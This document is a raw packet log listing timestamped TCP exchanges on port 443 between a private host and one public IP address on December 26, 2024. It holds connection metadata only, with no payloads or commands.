Dec 26, 2024 18:26:53.200388908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.200453043 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.200459003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.200506926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.207479954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.207493067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.207555056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.207559109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.207606077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.214638948 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.214653969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.214730024 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.214735031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.214782000 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.220953941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.220968962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.221049070 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.221054077 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.221097946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.227561951 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.227582932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.227653027 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.227658033 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.227713108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.234740019 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.234756947 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.234828949 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.234834909 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.234879971 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.245369911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.245387077 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.245460033 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.245465994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.245512962 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.404016972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.404033899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.404154062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.404160976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.404230118 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.411097050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.411112070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.411185980 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.411190033 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.411236048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.417357922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.417371988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.417438984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.417448044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.417499065 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.424566031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.424581051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.424645901 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.424650908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.424712896 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.431731939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.431745052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.431807041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.431813002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.431840897 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.431859970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.438491106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.438508034 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.438572884 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.438579082 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.438631058 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.445527077 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.445542097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.445616007 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.445622921 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.445677042 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.455785036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.455800056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.455873013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.455877066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.455919981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.615128994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.615145922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.615283966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.615293980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.615338087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.621371031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.621386051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.621476889 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.621481895 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.621537924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.628453970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.628470898 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.628557920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.628562927 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.628619909 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.635646105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.635662079 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.635739088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.635745049 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.635786057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.641910076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.641925097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.641995907 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.642000914 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.642057896 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.649589062 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.649605989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.649692059 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.649698019 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.649749041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.657222033 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.657237053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.657309055 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.657315969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.657362938 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.669054031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.669073105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.669127941 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.669136047 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.669181108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.825329065 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.825350046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.825429916 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.825450897 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.825503111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.832613945 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.832631111 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.832711935 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.832719088 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.832768917 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.839812994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.839828014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.839894056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.839899063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.839946985 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.843717098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.843760967 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.843795061 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.843801022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.843843937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.849961042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.849977970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.850040913 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.850048065 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.850096941 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.857592106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.857605934 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.857665062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.857670069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.857718945 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.863842964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.863859892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.863925934 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.863930941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.863975048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.874859095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.874874115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.874955893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.874960899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.875005007 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.033859015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.033917904 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.033973932 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.033987045 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.034001112 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.034030914 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.040724039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.040772915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.040818930 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.040824890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.040858030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.040879965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.046905994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.046948910 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.046983957 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.046988010 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.047020912 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.047043085 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.054373026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.054414988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.054456949 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.054461002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.054492950 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.054502964 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.061383963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.061424017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.061463118 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.061466932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.061501980 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.061520100 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.067928076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.067970037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.068013906 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.068017960 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.068030119 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.068057060 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.075172901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.075212955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.075251102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.075254917 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.075285912 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.075315952 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.085452080 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.085494041 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.085525990 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.085530043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.085556984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.085576057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.244795084 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.244837046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.244888067 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.244895935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.244946003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.251828909 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.251869917 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.251919031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.251924038 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.251936913 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.251971006 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.258078098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.258119106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.258156061 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.258160114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.258186102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.258208036 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.265208006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.265249968 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.265286922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.265290976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.265321016 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.265338898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.272588015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.272644043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.272670031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.272674084 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.272711039 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.272722960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.279025078 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.279067039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.279154062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.279160023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.279212952 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.286231041 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.286274910 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.286318064 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.286322117 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.286355972 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.286370993 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.295861959 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.295906067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.295952082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.295955896 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.295984983 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.296005011 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.454982042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.455030918 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.455089092 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.455095053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.455132008 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.455148935 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.462157965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.462218046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.462249041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.462253094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.462287903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.462302923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.468451977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.468492985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.468523026 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.468527079 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.468549967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.468568087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.475495100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.475528002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.475570917 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.475575924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.475594044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.475620985 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.482635975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.482651949 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.482738018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.482743979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.482786894 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.489375114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.489391088 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.489440918 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.489445925 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.489486933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.496587992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.496603966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.496665001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.496670008 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.496721029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.506280899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.506298065 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.506352901 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.506356955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.506397963 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.665384054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.665400028 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.665499926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.665508032 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.665556908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.672455072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.672472000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.672529936 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.672533989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.672583103 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.679568052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.679585934 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.679662943 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.679668903 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.679728985 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.685894966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.685910940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.685977936 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.685982943 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.686029911 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.692912102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.692926884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.692982912 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.692989111 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.693032026 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.699704885 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.699719906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.699774981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.699779987 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.699821949 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.706772089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.706787109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.706831932 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.706836939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.706882000 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.716989040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.717055082 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.717057943 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.717066050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.717113018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.875946045 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.875962973 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.876023054 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.876030922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.876075029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.883200884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.883215904 CET	443	49719	172.67.214.186	192.168.2.16
